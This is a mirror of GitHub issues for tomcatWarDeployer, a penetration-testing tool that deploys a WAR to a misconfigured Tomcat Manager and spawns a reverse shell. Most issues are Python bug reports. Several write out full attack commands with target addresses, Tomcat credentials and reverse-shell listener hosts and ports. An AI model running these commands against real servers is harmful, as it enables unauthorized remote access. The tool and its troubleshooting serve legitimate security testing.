Giter VIP home page Giter VIP logo

tomcatwardeployer's Issues

ImportError: No module named mechanize

IGOR-3:bin root# python tomcat.py
Traceback (most recent call last):
File "tomcat.py", line 40, in
import mechanize
ImportError: No module named mechanize
IGOR-3:bin root#

SyntaxError: multiple exception types must be parenthesized

Hello, when I tried to run your script. It raises errors

If I run with python3

File "/home/kali/Desktop/tomcatWarDeployer/./tomcatWarDeployer.py", line 206
    except socket.error, e:
           ^^^^^^^^^^^^^^^
SyntaxError: multiple exception types must be parenthesized

If I run with python2

Traceback (most recent call last):
  File "tomcatWarDeployer.py", line 40, in <module>
    import mechanize
ImportError: No module named mechanize

How to fix this?

Crash - variable used before assignment

Command: # python tomcatWarDeployer-master/tomcatWarDeployer.py -x http://10.10.10.95:8080 -U tomcat -P s3cret -H LHOST=10.10.15.242 -p 12345

Output:

INFO: Apache Tomcat/7.0.88 Manager Application reached & validated.
INFO: 	At: "http://10.10.10.95:8080/manager"
WARNING: Application with name: "jsp_app" is already deployed.
Traceback (most recent call last):
  File "tomcatWarDeployer-master/tomcatWarDeployer.py", line 1165, in <module>
    main()
  File "tomcatWarDeployer-master/tomcatWarDeployer.py", line 1078, in main
    if unloadApplication(browser, args[0], opts.appname):
  File "tomcatWarDeployer-master/tomcatWarDeployer.py", line 709, in unloadApplication
    browser.form.action = new_action
UnboundLocalError: local variable 'new_action' referenced before assignment

TypeError: cannot use a string pattern on a bytes-like object

I'm getting this error when launching the script (python 2.7 or python 3.9).

Traceback (most recent call last):
  File "/home/XXX/GitHub/tomcatWarDeployer/tomcatWarDeployer.py", line 1224, in <module>
    main()
  File "/home/XXX/GitHub/tomcatWarDeployer/tomcatWarDeployer.py", line 1063, in main
    browser, url = browseToManager(
  File "/home/XXX/GitHub/tomcatWarDeployer/tomcatWarDeployer.py", line 863, in browseToManager
    m = re.search('Apache Tomcat/([^<]+)', data)
  File "/usr/lib/python3.9/re.py", line 201, in search
    return _compile(pattern, flags).search(string)
TypeError: cannot use a string pattern on a bytes-like object

What can I do to solve it ?

License

Hello,

I'd like to add your tool into ArchStrike but your tool doesn't have a license.

Is it possible to add one?

Thanks.

run time bug

python tomcatWarDeployer.py -u x.x.x.x -p 8080 -U tomcat -P s3cret

    tomcatWarDeployer (v. 0.4)
Apache Tomcat auto WAR deployment & launching tool
Mariusz B. / MGeeky '16-18

Penetration Testing utility aiming at presenting danger of leaving Tomcat misconfigured.

Traceback (most recent call last):
File "tomcatWarDeployer.py", line 1057, in
main()
File "tomcatWarDeployer.py", line 878, in main
(opts, args) = options()
File "tomcatWarDeployer.py", line 841, in options
host = extractHostAddress(args[0], opts.url)
IndexError: list index out of range

ERROR: Executing 'where jar' returned: 'Command 'where jar' returned non-zero exit status 127'

Hi,
I cannot get the reverse shell on the target

python2 tomcatWarDeployer.py -U tomcatadm -P 'T0mc@t_s3cret_p@ss!' -H 10.10.14.51 -p 9999 -u /manager/html/ 10.129.89.161:8080

        tomcatWarDeployer (v. 0.5.2)
        Apache Tomcat auto WAR deployment & launching tool
        Mariusz Banach / MGeeky '16-18

Penetration Testing utility aiming at presenting danger of leaving Tomcat misconfigured.

INFO: Reverse shell will connect to: 10.10.14.51:9999.
INFO: Apache Tomcat/9.0.31 (Ubuntu) Manager Application reached & validated.
INFO:   At: "http://10.129.89.161:8080/manager/html/"
ERROR: Executing 'where jar' returned: 'Command 'where jar' returned non-zero exit status 127'
Traceback (most recent call last):
  File "tomcatWarDeployer.py", line 1224, in <module>
    main()
  File "tomcatWarDeployer.py", line 1102, in main
    code, opts.title, opts.appname)
  File "tomcatWarDeployer.py", line 368, in generateWAR
    raise MissingDependencyError
__main__.MissingDependencyError

How to fix this?
Thanks!

mechnaize

mechanize does not handle non-numeric ports, hence putting the application on a non common http ports (ports outside 80, 8080, 8000) wont allow connection, consider changing the connection script used

Entering wrong credentials leads to AttributeError

If the wrong credentials are supplied through the -U and -P options, the following error results:

Traceback (most recent call last):
File "war.py", line 1054, in
main()
File "war.py", line 953, in main
if checkIsDeployed(browser, url, appname):
File "war.py", line 630, in checkIsDeployed
browser.open(url)
AttributeError: 'int' object has no attribute 'open'

This is because the browseToManager() function returns (403, 403) and the main function doesn't handle this if the -U and -P options are provided.

tcpRevershell ESTABLISH failed

i use the tool to test TOMCAT
because my server is in the LAN so i use ngrok to put my server in the internet then i listen 127.0.0.1 with Ncat.
now i can't receive the reverseTCP shell to my server

PS:my english is bad, sorry
here is the ERRORs:
ERROR: Establishing local listener failed.
Error: '[Errno 99] Cannot assign requested address'
ERROR: Could not establish local TCP listener.
ERROR: Could not setup reverse-shell handler.

Crash when using existing war file

Command: # python tomcatWarDeployer-master/tomcatWarDeployer.py -x http://10.10.10.95:8080 -U tomcat -P s3cret -H LHOST=10.10.15.242 -p 22335 -f foobar_on_fire.war

Output:

        tomcatWarDeployer (v. 0.5)
	Apache Tomcat auto WAR deployment & launching tool
	Mariusz B. / MGeeky '16-18

Penetration Testing utility aiming at presenting danger of leaving Tomcat misconfigured.
	
INFO: Reverse shell will connect to: LHOST=10.10.15.242:22335.
Traceback (most recent call last):
  File "tomcatWarDeployer-master/tomcatWarDeployer.py", line 1165, in <module>
    main()
  File "tomcatWarDeployer-master/tomcatWarDeployer.py", line 982, in main
    (opts, args) = options()
  File "tomcatWarDeployer-master/tomcatWarDeployer.py", line 965, in options
    if opts.file and not os.path.exists(file):
  File "/usr/lib/python2.7/genericpath.py", line 26, in exists
    os.stat(path)
TypeError: coercing to Unicode: need string or buffer, type found

small tutorial please

first thanks for this job , can you please put a small tutorial about this tools i kinda confused a little hh, thanks

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.